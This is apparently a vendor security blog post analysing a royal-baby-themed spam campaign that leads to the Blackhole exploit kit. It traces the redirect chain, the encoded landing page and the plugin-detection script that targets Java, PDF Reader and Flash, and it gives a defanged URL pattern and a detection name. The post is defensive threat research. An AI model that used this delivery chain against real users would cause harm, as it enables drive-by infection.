The Dangers of a Royal Baby: Scams Abound

Big news stories are always an opportunity for scammers and spammers, who attempt to redirect users to malicious exploit kits or other unwanted services. Britain’s royal baby is the latest news to offer cover for malware. We have already found a lot of spam messages regarding the birth and baby that lead users to the infamous Blackhole exploit kit.

The initial infection arrives as spam mail that contains a redirection URL in the following format:

Royal_Baby_gift

Figure 1: Spam email.

  • hxxp://[infectedDomain]/[Random]/index.html

From there the user will land on a page with links to JavaScript files as in the next image:

Spam URL

Figure 2: Spam URL.

The first level contains the three *.js URLs that point to other infected/malicious domains. Once victims land on this page, the JavaScript files will lead them to a page like the following:

Blackhole Landing page redirector

Figure 3: Blackhole landing page redirector.

The second-level URL shows us the actual landing page of the Blackhole exploit kit, which leads us to this content:

customized encoded Blackhole Landing page

Figure 4: Customized encoded Blackhole landing page.

We have decoded the customized base64-encoded Blackhole landing page, which resulted in a “plug-in detect” JavaScript code. This is a piece of code used by Blackhole to identify which plug-ins are installed on the machine, so it can target the payload for the specific plug-in versions available in the user’s browser. The next image shows us the decoded PluginDetect.js:

Decode Blackhole Landing Page (plugindetect.js with malicious URL)

Figure 5: Decoded Blackhole landing page (PluginDetect.js with malicious URL).

The following browser plug-ins are known to be targeted by the exploit kit:

  • Java Runtime Environment
  • Adobe PDF Reader
  • Flash

McAfee coverage for the PluginDetect.js zero-day threat is JS/Exploit!JNLP.d.

The following images show the PDF and Java downloading a malicious URL:

JAVA_11

Figure 6: JAR file downloading the URL in PluginDetect.js.

PDF file download URL in plugindetect.js

Figure 7: PDF file downloading the URL in PluginDetect.js.

This chain redirection could leave victims infected with one of these malware families:

For more detail about the Blackhole exploit kit, please refer the McAfee Threat Advisory Library.

Thanks to my colleague Rohan Shah for his assistance with this blog.